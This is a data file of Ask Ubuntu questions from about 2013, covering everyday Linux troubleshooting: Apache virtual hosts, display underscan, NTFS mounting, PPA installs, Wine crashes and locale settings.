338715	.zip file in ubuntu	i am new to ubuntu and trying to play around with android development . while trying to install android sdk , i can see the sdk being in .zip format . does .zip file is a valid archive format for ubuntu ? . http : //dl.google.com/android/adt/adt-bundle-linux-x86_64-20130729.zip
338716	firefox not displaying latex ( via mathjax )	i 'm using firefox 23.0 on ubuntu 12.04 lts 64-bits . i 'm having problems with seeing math formulas on math stack exchange . i went to the mathjax website and there i can see the ml but not the latex . i think this is an ubuntu problem , since i can see everything well on a mac and on windows ( using firefox ) . i 've tried to start firefox in safemode to make sure it 's not an add-on or extension issue , and the problem persisted . i 've tried other machines on the same network , and they had the same problem . i 've also tried one of them on a different network and everything worked fine . therefore , i now believe this is a network problem and not an ubuntu problem . i still have no idea what can be causing it , and wold very much welcome some ideas , but this question should be closed . my apologies . edit : ( i 've posted the problem on mathjax users group with links to here ) . here 's a summary of what i 've recently tried : i 've cleared firefox 's cache , prevented it from using dns , flushed dns from my os ( with dns-clean command on ubuntu 12.04 lts 64-bit ) , started firefox in safemode and the problem persisted . i 've completely reset my router and configured a new wireless network and the problem is still there ! any ideas ?
338718	apache server virtual host not working	i 'm having trouble setting up apache server . i have n't turned anything off from the default install and i 'm trying to enable the functionality for `` virtual hosts . '' i would like apache server , which is hosted on ec2 ( 12.04 server ) , to serve my site when people visit . my dns provider is godaddy and i 've forwarded my site from godaddy to my ec2 address . problem is that no matter what i do , the default `` it works ! '' page is always served . i ca n't figure it out . this is the top of my ports.conf file : namevirtualhost *:80 listen 80 < ifmodule mod_ssl.c > # if you add namevirtualhost *:443 here , you will also have to change # the virtualhost statement in /etc/apache2/sites-available/default-ssl # to < virtualhost *:443 > # server name indication for ssl named virtual hosts is currently not # supported by msie on windows xp . listen 443 < /ifmodule > < ifmodule mod_gnutls.c > listen 443 < /ifmodule > my site is specified in sites-available file and there is a symbolic link visible to my site 's directory in sites-enabled . this is in the sites-available file for my site : < virtualhost *:80 > serveradmin someemail @ gmail.com servername somesite.com serveralias *.somesite.com documentroot /var/www/somesite < directory / > options followsymlinks allowoverride all < /directory > < directory /var/www/somesite > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > any suggestions ? any further information needed ? i 've spend hours on this and have gotten no where . i seem to be doing everything the tutorials say to do . i have not disabled the default but have read that it 's good to keep that up ? thanks .
338720	optimizing gvim fonts in ubuntu 13.04	i 'm using tweak tool to optimize font settings like anti-aliasing and font-hinting in ubuntu 13.04 . while this affects everything else on my system , the fonts in the gvim window ( the actual code ) shows no difference . how do i change the hinting or anti-aliasing settings for gvim ( or whichever rendering engine it is using ) ?
338723	gnome task bar - no menus visible	gnome does n't display any of the icons on the top right hand side of the taskbar i.e . the messaging , network , system tools etc . please help me with that . there 's an image link . gnome : unity :
338724	how do i install linux to a bootable usb stick ?	i do n't mean to create a bootable live usb stick that has some persistent storage , i mean to actually install ubuntu on a usb stick and be able to boot up from this on any computer . i 've managed to create a bootable live usb stick that is n't a full-blown installation with my own user account and data and everything , and also managed to install ubuntu on the usb stick without being able to boot up from the usb stick , but i have not managed to accomplish both at the same time so far . edit : this answer also only gives me the `` managed to install ubuntu on the usb stick without being able to boot up from the usb stick '' problem that i have already encountered : ( edit 2 : and all the answers about using unetbootin only give me the `` bootable live usb stick that is n't a full-blown installation '' that i have also encountered .
338726	wo n't execute terminal commands	i have been using ubuntu 12.04 for quite a while and have never had a problem come at me out of the blue like this . i 'm trying to install python 3.2 on my ubuntu system and every time i run the code to compile the python source , i get this error : 'command 'sudo ' is available in '/usr/bin/sudo' the command could not be located because '/usr/bin ' is not included in the path environment variable . sudo : command not found' i 've also tried running gksudo command to view what my environment shows but i pretty much get the same error .
338737	minecraft menu 's and sky are transparent	ive successfully downloaded minecraft on ubuntu but for some reason , when i open menu 's that would be transparent and show something in-game on the other side it shows my desktop faintly instead . also if i look at the sky it clearly shows the desktop . otherwise it works perfectly besides a tone of lag , but i blame that on the 0.99gb of ram i have , can anybody help ?
338741	is hp compaq elite 8300 supported for ubuntu 12.04 32 bit version ?	i 'm using ubuntu 12.04 32 bit on a hp compaq elite 8300 pc . sometimes my machine freezes while i 'm working . i want to know whether ubuntu is well-supported on this hardware .
338742	rcmdr in r 3.0.1 asks to install rgl package everyime i open rcmdr	i have installed r 3.0.1 in my ubuntu 12.04 laptop . i started r as root by sudo r , then installed rcmdr package by the following command : install.packages ( `` rcmdr '' , dependencies = true ) but everytime i run rcmdr by library ( rcmdr ) , it says that the package rgl is not installed , and asks to install it . i do , but next time when i run rcmdr , it again asks to install rgl . what should i do ?
338744	timezone change resets after reboot ubuntu 11.10	i am trying to change my timezone from hkt to jst or any other timezone for that using the most commonly used command that i can find sudo dpkg-reconfigure tzdata . this successfully changes the timezone to jst . but upon reboot it reverts to hkt . i can not seem to find any solid answers to this other than use sudo dpkg-reconfigure tzdata ? thanks in advance .
338753	gmail text not appearing in firefox	on ubuntu , i was working with a single user till yesterday . the gmail chat app was working on firefox . this morning , i installed google chrome , created a parallel user as an administrator , and logged into the parallel user . lo and behold , everytime i log in to google related sites , there is no font or character being displayed . i checked this on chrome , and texts are intact ! to be sure , i deleted the ./mozilla folder in the home directory , but the problem persists . what is the reason that this would be happening ?
338757	ati radeon 5770 with viewsonic vx2835wm 28â hdmi / dvi underscan issues	turns out this is called overscan / underscan problem . test image for 1920x1200 so getting closer but still not perfect , with 3.9.0-030900-generic kernel xrandr -- output hdmi-0 -- set underscan on -- mode 1920x1200 this way i can see my entire desktop , but there is a roughly 100 pixel black border wasting useful screen estate ! underscan-on xrandr -- output hdmi-0 -- set underscan off -- mode 1920x1200 this way the desktop probably fills up the physical display , but i can not see it all as some parts of it goes `` under '' the black border underscan-off 3.10.9 kernel does not have this underscan issue , but no hdmi audio , otherwise the video output is just black screen question is still , how to get the native resolution of the screen working properly with hdmi audio if possible . also tried 3.11-rc7 kernel , the overscanning / underscanning issue additionally there is no hdmi audio device - same kernel config so seems like 3.10.9 is my best bet if i can live without the audio through hdmi ======== using ubuntu 13.04 raring i had the oss radeon drivers configured with 3.9.0-030900-generic kernel which i compiled and it was working very well . the card is an ati radeon 5770 connected to a viewsonic vx2835wm 28â screen through hdmi , but the results were the same through the dvi interface as well . i am not sure what happen , but after a few apt-get upgrades it stopped working properly - maybe it is something else than upgrades not sure . there might be something going wrong with the edid of the screen not sure , see the bottom for some tests . in the native resolution of the screen which is 1920x1200 the desktop would overlap the physical screen , without panning . so if you put a window in full screen the edges of the window would be off the screen on the top and the two sides . here are some visual mockup approximation of what i could achive . the ubuntu caption at the login screen was cut off ... the only other option i could achieve with some tweaking was to have a black border around the screen either covering up the desktop or with a downscaled version of the desktop . either way it was not working properly . i tried a number of things , i can not recall them exactly but eventually i gave up and tried to install the proprietary fglrx catalyst drivers . after installing fglrx i tried the scaling options from the control panel . when it was set 'use graphics process for scaling ' , i could not select 1920x1200 only 1920x1080 , when it was selected to scale with 'use display for scaling ' i could select 1920x1200 but i had the same black border covering up desktop space and windows overlapping the visible are when maximized . i could get 1920x1080 working by tweaking the scaling bar underscan/overscan option but the text was blurry i was not happy with it , i wanted the native resolution . i decided to go back to the oss drivers and recompile a new version of the kernel 3.10.9 . after doing so and purging fglrx as described on the help wiki of ubuntu i got a totally blank screen after boot . i tried ctrl-alt-backspace to restart x , tried ctrl-alt-f1 .. f6 to check text consoles all of them were pitch black . i booted the new kernel into recovery mode and after a few tries i managed to figure out that if i boot the kernel with appending the nomodeset option it boots into poor graphics mode , than i run modprobe radeon setmode=1 from a text console restart lightdm and im good to login in 1920x1080 , after that i could use xandr -- output hdmi-0 -- mode 1920x1200 and all works as expected . however i could not figure out how to configure the system to get everything working automatically at boot time , so after each reboot i have to do the dance . xrandr -q now shows screen 0 : minimum 320 x 200 , current 1920 x 1200 , maximum 8192 x 8192 displayport-0 disconnected ( normal left inverted right x axis y axis ) hdmi-0 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 708mm x 398mm 1920x1080 60.0 + 1920x1200 60.0* 1920x1080i 30.0 1680x1050 59.9 1400x1050 59.9 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1280x720 60.0 1024x768 75.1 70.1 60.0 1440x480 59.9 1440x480i 30.0 30.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 720x480 59.9 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dvi-0 disconnected ( normal left inverted right x axis y axis ) dvi-1 disconnected ( normal left inverted right x axis y axis ) get-edid says : *********** something special has happened ! please contact the author , ... edid claims 1 more blocks left edid blocks left is wrong . your edid is probably invalid . while parse-edid says : parse-edid : edid checksum failed - data is corrupt . continuing anyway . parse-edid : first bytes do n't match edid version 1 header parse-edid : do not trust output ( if any ) . # edid version 1 revision 3 section `` monitor '' # block type : 2:0 3 : ff # block type : 2:0 3 : fd # block type : 2:0 3 : fc identifier `` vx2835wm '' vendorname `` vsc '' modelname `` vx2835wm '' # block type : 2:0 3 : ff # block type : 2:0 3 : fd horizsync 30-82 vertrefresh 50-76 # max dot clock ( video bandwidth ) 150 mhz # block type : 2:0 3 : fc # dpms capabilities : active off : yes suspend : no standby : no mode `` 1920x1080 '' # vfreq 60.000hz , hfreq 67.500khz dotclock 148.500000 htimings 1920 2008 2052 2200 vtimings 1080 1084 1089 1125 flags `` +hsync '' `` +vsync '' endmode # block type : 2:0 3 : ff # block type : 2:0 3 : fd # block type : 2:0 3 : fc endsection dpkg -l | grep radeon ii libdrm-radeon1 : amd64 2.4.46+git20130702.c6d73cfe-0ubuntu0sarvatt~raring amd64 userspace interface to radeon-specific kernel drm services -- runtime ii xserver-xorg-video-radeon 1:7.1.99+git20130730.6a278369-0ubuntu0sarvatt~raring amd64 x.org x server -- amd/ati radeon display driver
338758	how to quickly extract all kinds of archived files from command-line ?	many times i need to extract different kinds of archived files using commad-line . but not all the time i remember the exact command for any type of file archive . so , i have to waste time and search again . how can i avoid this ?
338760	after adding ppa source for `` skippy-xd '' , the package still can not be found	after adding ppa source for `` skippy-xd '' , the package still can not be found : majo @ think : ~ $ sudo add-apt-repository ppa : landronimirc/skippy-xd [ sudo ] password for majo : you are about to add the following ppa to your system : fullscreen composited task-switcher for x11 skippy-xd is a program that provides exposăš-like features found on the mac os x operating system . it is a standalone application for providing a window picker with live previews ( including live video ) on linux desktops that run an x server with compositing support . thus it is not part of the window manager , and the compositing is not being used all the time . if you work with many windows , your desktop may begin to get cluttered . you can use skippy-xd to quickly and conveniently find the right window that you are looking for . it allows you to press a hotkey and see miniature versions of all your active windows at once . to use skippy-xd , you need xfce ( xfwm4 ) or a netwm compliant window manager ( lxde , openbox-based window managers , etc. ) . http : //code.google.com/p/skippy-xd/ more info : https : //launchpad.net/~landronimirc/+archive/skippy-xd press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmp1q3041/secring.gpg ' created gpg : keyring `/tmp/tmp1q3041/pubring.gpg ' created gpg : requesting key 23a187b2 from hkp server keyserver.ubuntu.com gpg : /tmp/tmp1q3041/trustdb.gpg : trustdb created gpg : key 23a187b2 : public key `` launchpad ppa for landronimirc '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok majo @ think : ~ $ sudo apt-get update ... reading package lists ... done majo @ think : ~ $ sudo apt-get install skippy-xd reading package lists ... done building dependency tree reading state information ... done e : unable to locate package skippy-xd majo @ think : ~ $ apt-cache search skippy majo @ think : ~ $ apt-cache search skippy-xd i am using ubuntu 13.04 with lubuntu-desktop additionally installed on my laptop . i get the same result on my netbook , where i have clean lubuntu 13.04 installed . downloading the package manually and installing works just fine , though . so it is not a big deal . but i was just wondering why i could not get the ppa working right . thanks in advance for any advices .
338763	how to update the bios in ubuntu	how to update my bios for my asus notebook ? this is the download page for the bios updates . i am currently at bios update 216 . should do all the updates or just do the newest one ? and what program should i use to do this ?
338771	problem with skyrim !	[ ubuntu 12.04lts ] when i try to launch skyrim via steam with wine , it wants to install directx 10 , then it launches game , or if we are more specific , error screens saying it hitted critical problem . this is full error report : unhandled exception : unimplemented function msvcp90.dll. ? ? 0 ? $ basic_ifstream @ _wu ? $ char_traits @ _w @ std @ @ @ std @ @ qae @ pb_whh @ z called in 32-bit code ( 0x7b839cf2 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip:7b839cf2 esp:0033f7a0 ebp:0033f804 eflags:00200246 ( - -- i z- -p- ) eax:7b826245 ebx:7b894ff4 ecx:00000000 edx:80000100 esi:80000100 edi:00429ef0 stack dump : 0x0033f7a0 : 0033f824 00000008 0041db3c 80000100 0x0033f7b0 : 00000001 00000000 7b839cf2 00000002 0x0033f7c0 : 7e449340 7e44c992 00000004 7e46f550 0x0033f7d0 : 0041db3c 0033f8bc 0033f7ec 00403e52 0x0033f7e0 : 00000001 00000000 0013e8b8 0033f81c 0x0033f7f0 : 00403059 0033fb18 7b839caa 00000000 000c : sel=0067 base=00000000 limit=00000000 16-bit r-x backtrace : = > 0 0x7b839cf2 in kernel32 ( +0x29cf2 ) ( 0x0033f804 ) 1 0x7e4492a8 in msvcp90 ( +0x392a7 ) ( 0x0033f834 ) 2 0x7e414825 in msvcp90 ( +0x4824 ) ( 0x0033fd38 ) 3 0x0040a040 in skyrimlauncher ( +0xa03f ) ( 0x0033fd38 ) 4 0x00412633 in skyrimlauncher ( +0x12632 ) ( 0x0033fde0 ) 5 0x00407acf in skyrimlauncher ( +0x7ace ) ( 0x0033fe70 ) 6 0x7b859cdc call_process_entry+0xb ( ) in kernel32 ( 0x0033fe88 ) 7 0x7b85af4f in kernel32 ( +0x4af4e ) ( 0x0033fec8 ) 8 0x7bc71db0 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x0033fed8 ) 9 0x7bc7486d call_thread_func+0x7c ( ) in ntdll ( 0x0033ffa8 ) 10 0x7bc71d8e rtlraiseexception+0x21 ( ) in ntdll ( 0x0033ffc8 ) 11 0x7bc49f4e call_dll_entry_point+0x61d ( ) in ntdll ( 0x0033ffe8 ) 0x7b839cf2 : subl $ 4 , % esp modules : module address debug info name ( 94 modules ) pe 400000- 5d2000 export skyrimlauncher pe 10000000-100a3000 deferred gameoverlayrenderer pe 3b400000-3b41e000 deferred steam_api elf 7b800000-7ba15000 dwarf kernel32 < elf > \-pe 7b810000-7ba15000 \ kernel32 elf 7bc00000-7bcc3000 dwarf ntdll < elf > \-pe 7bc10000-7bcc3000 \ ntdll elf 7bf00000-7bf04000 deferred < wine-loader > elf 7d676000-7d67f000 deferred librt.so.1 elf 7d67f000-7d684000 deferred libgpg-error.so.0 elf 7d684000-7d69c000 deferred libresolv.so.2 elf 7d69c000-7d6a0000 deferred libkeyutils.so.1 elf 7d6a0000-7d6e9000 deferred libdbus-1.so.3 elf 7d6e9000-7d6fb000 deferred libp11-kit.so.0 elf 7d6fb000-7d780000 deferred libgcrypt.so.11 elf 7d780000-7d792000 deferred libtasn1.so.3 elf 7d792000-7d79b000 deferred libkrb5support.so.0 elf 7d79b000-7d7a0000 deferred libcom_err.so.2 elf 7d7a0000-7d7c8000 deferred libk5crypto.so.3 elf 7d7c8000-7d897000 deferred libkrb5.so.3 elf 7d897000-7d8a9000 deferred libavahi-client.so.3 elf 7d8a9000-7d8b7000 deferred libavahi-common.so.3 elf 7d8b7000-7d97b000 deferred libgnutls.so.26 elf 7d97b000-7d9b9000 deferred libgssapi_krb5.so.2 elf 7d9b9000-7da0c000 deferred libcups.so.2 elf 7dddd000-7de11000 deferred uxtheme < elf > \-pe 7dde0000-7de11000 \ uxtheme elf 7de11000-7de17000 deferred libxfixes.so.3 elf 7de17000-7de22000 deferred libxcursor.so.1 elf 7de24000-7de38000 deferred psapi < elf > \-pe 7de30000-7de38000 \ psapi elf 7de94000-7debe000 deferred libexpat.so.1 elf 7debe000-7def2000 deferred libfontconfig.so.1 elf 7def2000-7df02000 deferred libxi.so.6 elf 7df02000-7df23000 deferred libxcb.so.1 elf 7df23000-7df29000 deferred libuuid.so.1 elf 7df29000-7df43000 deferred libice.so.6 elf 7df43000-7e077000 deferred libx11.so.6 elf 7e077000-7e089000 deferred libxext.so.6 elf 7e089000-7e092000 deferred libsm.so.6 elf 7e093000-7e097000 deferred libxcomposite.so.1 elf 7e097000-7e0a0000 deferred libxrandr.so.2 elf 7e0a0000-7e0aa000 deferred libxrender.so.1 elf 7e0aa000-7e13d000 deferred winex11 < elf > \-pe 7e0b0000-7e13d000 \ winex11 elf 7e13d000-7e153000 deferred libz.so.1 elf 7e153000-7e1ed000 deferred libfreetype.so.6 elf 7e1ed000-7e20f000 deferred imm32 < elf > \-pe 7e1f0000-7e20f000 \ imm32 elf 7e20f000-7e237000 deferred msacm32 < elf > \-pe 7e210000-7e237000 \ msacm32 elf 7e237000-7e2e4000 deferred winmm < elf > \-pe 7e240000-7e2e4000 \ winmm elf 7e2e4000-7e327000 deferred dsound < elf > \-pe 7e2f0000-7e327000 \ dsound elf 7e327000-7e356000 deferred msvcr90 < elf > \-pe 7e330000-7e356000 \ msvcr90 elf 7e356000-7e3e3000 deferred msvcrt < elf > \-pe 7e370000-7e3e3000 \ msvcrt elf 7e3e3000-7e4c8000 dwarf msvcp90 < elf > \-pe 7e410000-7e4c8000 \ msvcp90 elf 7e4c8000-7e53d000 deferred rpcrt4 < elf > \-pe 7e4d0000-7e53d000 \ rpcrt4 elf 7e53d000-7e645000 deferred ole32 < elf > \-pe 7e550000-7e645000 \ ole32 elf 7e645000-7e73d000 deferred comctl32 < elf > \-pe 7e650000-7e73d000 \ comctl32 elf 7e73d000-7e756000 deferred version < elf > \-pe 7e740000-7e756000 \ version elf 7e756000-7e813000 deferred gdi32 < elf > \-pe 7e760000-7e813000 \ gdi32 elf 7e813000-7e953000 deferred user32 < elf > \-pe 7e820000-7e953000 \ user32 elf 7e953000-7e9bd000 deferred shlwapi < elf > \-pe 7e960000-7e9bd000 \ shlwapi elf 7e9bd000-7ebce000 deferred shell32 < elf > \-pe 7e9d0000-7ebce000 \ shell32 elf 7ebce000-7ec2e000 deferred advapi32 < elf > \-pe 7ebe0000-7ec2e000 \ advapi32 elf 7ec4f000-7ec69000 deferred libnsl.so.1 elf 7ec69000-7ec72000 deferred libnss_compat.so.2 elf 7efbc000-7efe8000 deferred libm.so.6 elf 7efed000-7eff3000 deferred libxxf86vm.so.1 elf 7eff3000-7f000000 deferred libnss_files.so.2 elf f7484000-f7488000 deferred libxinerama.so.1 elf f7489000-f748e000 deferred libdl.so.2 elf f748e000-f7637000 deferred libc.so.6 elf f7638000-f7653000 deferred libpthread.so.0 elf f7654000-f765b000 deferred libxdmcp.so.6 elf f765b000-f765f000 deferred libxau.so.6 elf f765f000-f766b000 deferred libnss_nis.so.2 elf f766b000-f77ad000 dwarf libwine.so.1 elf f77af000-f77d1000 deferred ld-linux.so.2 elf f77d1000-f77d2000 deferred [ vdso ] .so threads : process tid prio ( all id : s are in hex ) 0000000e services.exe 0000007f 0 0000007e 0 0000001f 0 00000015 0 00000010 0 0000000f 0 00000012 winedevice.exe 0000001d 0 0000001a 0 00000014 0 00000013 0 0000001b plugplay.exe 00000021 0 0000001e 0 0000001c 0 00000022 explorer.exe 00000023 0 0000003f agent.exe 00000049 0 00000048 0 0000003c 0 0000003e 0 00000041 0 00000025 0 00000031 0 0000002c 0 00000028 0 00000027 0 0000002d 0 00000040 0 0000005f steam.exe 00000039 0 00000052 0 000000a1 0 000000a2 0 000000c2 0 00000047 0 00000056 0 0000004f 0 0000000d 0 0000000b 0 00000017 0 00000054 0 0000005b 0 00000036 0 0000005e 0 0000005a 0 00000043 0 00000032 0 00000051 0 0000004b 0 00000035 0 00000064 0 00000057 0 00000046 0 00000062 0 00000063 0 00000066 0 00000065 0 0000003d 0 00000060 0 00000034 0 0000004d 0 00000019 0 00000055 0 00000061 0 00000026 0 0000005c 0 00000009 0 00000059 0 0000002a 0 0000004a 0 00000038 0 00000045 0 00000018 0 00000042 0 0000005d 0 0000007b svchost.exe 00000093 0 00000085 0 00000084 0 00000082 0 00000081 0 0000007d 0 0000007c 0 000000a6 ( d ) c : \program files ( x86 ) \steam\steamapps\common\skyrim\skyrimlauncher.exe 000000a5 0 < == system information : wine build : wine-1.4 platform : i386 ( wow64 ) host system : linux host version : 3.5.0-39-generic
338775	why do i get `` metadata kept in windows cache , refused to mount '' when i try to mount my ntfs drive ?	i have trouble with mounting my hard disk : error mounting /dev/sda5 at /media/quetzalcroix/datasave : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/quetzalcroix/datasave '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i forgot to restart my windows 8 before i 'm installing ubuntu and format my c : \ drive . is there any other options that i could do to mount this ? or i should backup my entire volume to other media and then i format my hard drive ?
338776	12.04 lts distro upgrade to 13.04 -- will it still be lts ?	if one installs ubuntu 12.04 , and does a distribution upgrade to ubuntu 13.04 , does the upgraded version still have five-year long term support ?
338779	virtual box guest ( windows7 ) in ubuntu 12.04 ( host ) not connecting to the internet .	have a virtual box running win7 inside an ubuntu host - the guest does not connect to the internet , but the host does . it is using an intel pro/1000 mt desktop adapter with settings set to autodetect . the ip config file reads : host name . . . . . . . . . . . . : pm-pc primary dns suffix . . . . . . . : node type . . . . . . . . . . . . : hybrid ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no ethernet adapter local area connection : connection-specific dns suffix . : description . . . . . . . . . . . : intel ( r ) pro/1000 mt desktop adapter physical address . . . . . . . . . : 08-00-27-6f-3b-61 dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes link-local ipv6 address . . . . . : fe80 : :7d84:5fe5 : a614:189a % 11 ( preferred ) ipv4 address . . . . . . . . . . . : 10.0.2.15 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 lease obtained . . . . . . . . . . : friday , 30 august 2013 10:24:35 am lease expires . . . . . . . . . . : saturday , 31 august 2013 10:24:35 am default gateway . . . . . . . . . : 10.0.2.2 dhcp server . . . . . . . . . . . : 10.0.2.2 dhcpv6 iaid . . . . . . . . . . . : 235405351 dhcpv6 client duid . . . . . . . . : 00-01-00-01-19-a7-5c-10-08-00-27-85-bd-42 dns servers . . . . . . . . . . . : 10.0.2.2 netbios over tcpip . . . . . . . . : enabled tunnel adapter isatap . { d7033cb4-cf6a-4828-8004-6bd8242c3e58 } : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : description . . . . . . . . . . . : microsoft isatap adapter physical address . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes tunnel adapter local area connection* 11 : connection-specific dns suffix . : description . . . . . . . . . . . : teredo tunneling pseudo-interface physical address . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes ipv6 address . . . . . . . . . . . : 2001:0:5ef5:79fd:2048:166f : f5ff : fdf0 ( preferred ) link-local ipv6 address . . . . . : fe80 : :2048:166f : f5ff : fdf0 % 13 ( preferred ) default gateway . . . . . . . . . : : : netbios over tcpip . . . . . . . . : disabled any suggestions ?
338780	how to access the pixel data that is displayed on screen ?	i would like to monitor what 's displayed on my screen . for exemple suppose i want to make my screen wobbly ( trembling like hell ) . then my idea is to access the data about pixels that are supposed to be displayed , then modify their coordinates , then sending them back to the display image queue . perhaps it 's not working that way at all , i do n't know ? any insight would be appreciated !
338788	how to fix corrupted graphics on a packard bell dotma ?	i installed ubuntu 13.04 on a packard bell dotma . dad got it from his ex-wife and told me i could have it if i could fix it because he did n't have the password for it , so i thought why not ubuntu ? i have now attempted twice to install ubuntu 13.04 and took pictures at second attempt . ( i 'm fairly new to ubuntu in general , so i do n't know too much about it but i have used it a bit ) installation went all fine first time all until i had to restart the computer after it was finished , i then got this message when it started up : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate ... i ignored it , forced shutdown with the button and tried to boot again as i thought it just had gotten stuck or something , after all.. it is a packard bell machine . after booting again i login , and everything is looking really weird ( pictures bellow ) . i figured maybe something had happened when writing over windows vista ( yes vista ) or something , so i used a killdisk and did a complete wipe . downloaded a new ubuntu 13.04 installation file , burned it on a new disk and installed it on my newly wiped machine . installation went fine , but again i got the : acpid : exiting speech-dispatcher disabled ; edit /etc/default/speech-dispatcher *asking all remaining processes to terminate ... and i let it stand there and ask for more than 30 minutes . forced shutdown again and here is an album in imgur of the boot process , or go further down , also , a picture from when i tried to boot straight from the cd there at the bottom as well . considering an attempt with 12.04 but afraid the same will happen again because i have read about another guy who got stuck on reboot after installing 12.04 and getting the same text up , kind of looking for tips before proceeding . any knowledge on this ? tried a little googling around , but not really sure what to search for . splash image : logging screen : dashboard : dash and shutting down booting with cd :
338792	how to have multiple sites using apache2 ?	i would like to have 2 sites on my development machine . i edited /etc/hosts as follow 127.0.0.1 restaurant.local www.restaurant.local 127.0.0.1 lrv4.local www.lrv4.local i created 2 new files /etc/apache2/sites-available/restaurant.local and ../lrv4.local < virtualhost restaurant.local:80 > servername restaurant.local serveralias www.restaurant.local documentroot /var/www/restaurant/public < directory /var/www/restaurant/public/ > options followsymlinks allowoverride none < /directory > customlog /var/log/apache2/restaurant.local-access.log combined < /virtualhost > < virtualhost lrv4.local:80 > servername lrv4.local serveralias www.lrv4.local documentroot /var/www/lrv4/public < directory /var/www/lrv4/public/ > options followsymlinks allowoverride none < /directory > customlog /var/log/apache2/lrv4.local-access.log combined < /virtualhost > these 2 files are relatively similar to one another . i enabled these 2 sites using sudo a2ensites restaurant.local sudo a2ensites lrv4.local i also check enabled sites using ls /etc/apache2/sites-enabled my problem is when i tried to access lrv4.local , i got the page belongs to restaurant.local , i tried to check the log file which i declared in virtualhost config file above , all logs are logged into /var/log/apache2/restaurant.local-access.log , nothing are logged into /var/log/apache2/lrv4.local-access.log . please help .
338795	how to install apache tomcat in ubuntu ?	i need to practice writing some java applications . can any one help me install tomcat and tell me how to start and stop the server .
338797	when i search for any city in google earth it zooms in at a wrong location	this is very weird . i open google earth and search for `` athens , greece '' for example , and even though it will through a pin on top of the correct location , the google earth globe will turn and zoom in towards a location in the sahara desert ! could this be related to the regional settings on the computer ? nass @ stardust : ~ $ locale lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric=el_gr.utf-8 lc_time=el_gr.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=el_gr.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=el_gr.utf-8 lc_name=el_gr.utf-8 lc_address=el_gr.utf-8 lc_telephone=el_gr.utf-8 lc_measurement=el_gr.utf-8 lc_identification=el_gr.utf-8 lc_all= what else could it be ?
338799	best partition layout for specific setup	i work at a webdevelopment company and we 're all getting new pc 's . our plan is to run a dual-boot system with ubuntu and windows 7 or 8 . i 've setup a few of these systems so i know the how of it , installing windows first , shrinking the partition etc . what i ca n't seem to find , despite reading many topics about the subject , is a way to determine the ideal partition layout . at home i have a 320gb disk divided roughly in 200gb for win , 10gb swap , and the rest for ubuntu itself . i 've seen no need to make a shared partition for both systems so i just gave both more then enough to work on their own . at work we 've only got a 128gb ssd to work with and we absolutely need some kind of shared space since we 'll be running both windows and ubuntu for developing and testing sites and apps . now i know ubuntu kan run find on less than 20gb , less than 10gb even . the system will have 16gb of ram , so i suppose the swap partition should be about the same size for hibernation purposes , probably somewhat smaller . windows is a disk hogger usually , but i can set most of the paths to the remaining partitions so that would help a lot . would 20gb suffice in that case ? so that would leave me with 20gb ubuntu , 16gb swap , 20gb win and about 72gb for shared storage . but i 'm not sure if this is the best division . i would probably need to install most of the windows applications on the 72gb partition . perhaps even the larger ubuntu apps , not sure . and what format would i use for the 72gb ? i suppose ntfs since that 's fastest for windows and ubuntu can work with it . are there any performance issues for ubuntu in this case ? i 'd love to hear your thoughts about this . thanks in advance
338801	notification icon for wireless connection when using /etc/network/interfaces	i have modified /etc/network/interfaces in order to connect to my wireless network automatically on startup . my question : is there a way , to put a notification icon on the top panel to confirm that the computer is connected . now the only icon is the one of nm which is being bypassed so is not useful . thanks .
338806	is there a way to edit/tweak the regional settings ?	is there a way to tweak the regional settings and , while preserving greek locale , i can change the decimal separator to en_us ? as this is necessary for google earth to work correctly ? i do n't see any button to change the number format in the language support dialog .
338807	backlight controls stop working once x starts	i 'm using a lenovo thinkpad x120e with ubuntu 12.04 lts 64-bit and a gnome 3.4 ( gnome-shell ) desktop environment . i have installed the latest proprietary amd drivers ( from their website ) for the amd radeon hd 6250 graphics card . my problem is that once the mouse appears on the screen at startup , the backlight controls ( fn+delete/home ) stop working . while it 's booting up , i can control the brightness just fine . at first it would n't work at all , but turning off vari-bright in catalyst control center fixed it . once logged in the osd works fine , but brightness control does not work , so it 's no a keyboard shortcut issue . i have tried adding acpi_backlight=vendor , acpi_backlight=video , acpi_osi=linux , acpi_osi= , and combinations of the two options to the grub config and they do not do anything ( of course i ran grub-update ) . i have also tried adding option `` registrydwords '' `` enablebrightnesscontrol=1 '' to the device section of xorg.conf ( i belive this is for nvidia drivers , but does n't hurt to try ) , and combined this with the grub configs , and this also does nothing . 